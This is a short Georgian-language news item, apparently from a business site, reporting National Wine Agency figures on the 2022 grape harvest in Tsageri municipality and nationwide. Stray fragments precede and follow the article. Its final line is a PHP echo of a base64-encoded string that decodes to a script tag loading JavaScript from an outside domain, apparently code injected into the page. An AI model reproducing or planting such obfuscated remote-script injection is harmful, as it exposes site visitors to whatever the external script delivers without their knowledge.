celsiusi
ავერსი შნაიდერი
ღვინის ეროვნული სააგენტოს ინფორმაციით, ცაგერის მუნიციპალიტეტში მოსახლეობა ღვინის კომპანიებს ყურძენს შეფერხების გარეშე აბარებს.
 
როგორც WWW.BUSINESSTIME.GE-ის ღვინის ეროვნული სააგენტოდან აცნობეს, 27 ოქტომბრის მდგომარეობით, ღვინის კომპანიების მიერ მიღებულია 134 ტონამდე ყურძენი. წინასწარი პროგნოზით, მიმდინარე წელს, ცაგერის რაიონში 700 ტონამდე ყურძნის მოსავალს მიიღებენ.
 
"ადგილობრივი მოსახლეობისგან ყურძენს, ამ ეტაპზე, ღვინის 12 საწარმო იბარებს. ცაგერის მუნიციპალიტეტში მიმღები პუნქტი 10 ლოკაციაზეა გახსნილი.
 
2022 წლის რთველი წარმატებით სრულდება. მთელი ქვეყნის მასშტაბით, ყურძნის მოსავალი ფაქტობრივად დაბინავებულია. ამ ეტაპისთვის, ქვეყნის მასშტაბით, 246 ათასამდე ტონა ყურძენი გადამუშავდა.
 
რთველი დასრულებულია რაჭის რეგიონშიც, სადაც 1570 ტონა ალექსანდროულისა და მუჯურეთულის მოსავალია გადამუშავებული", - ნათქვამია ღვინის ეროვნული სააგენტოს ინფორმაციაში. 
451
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");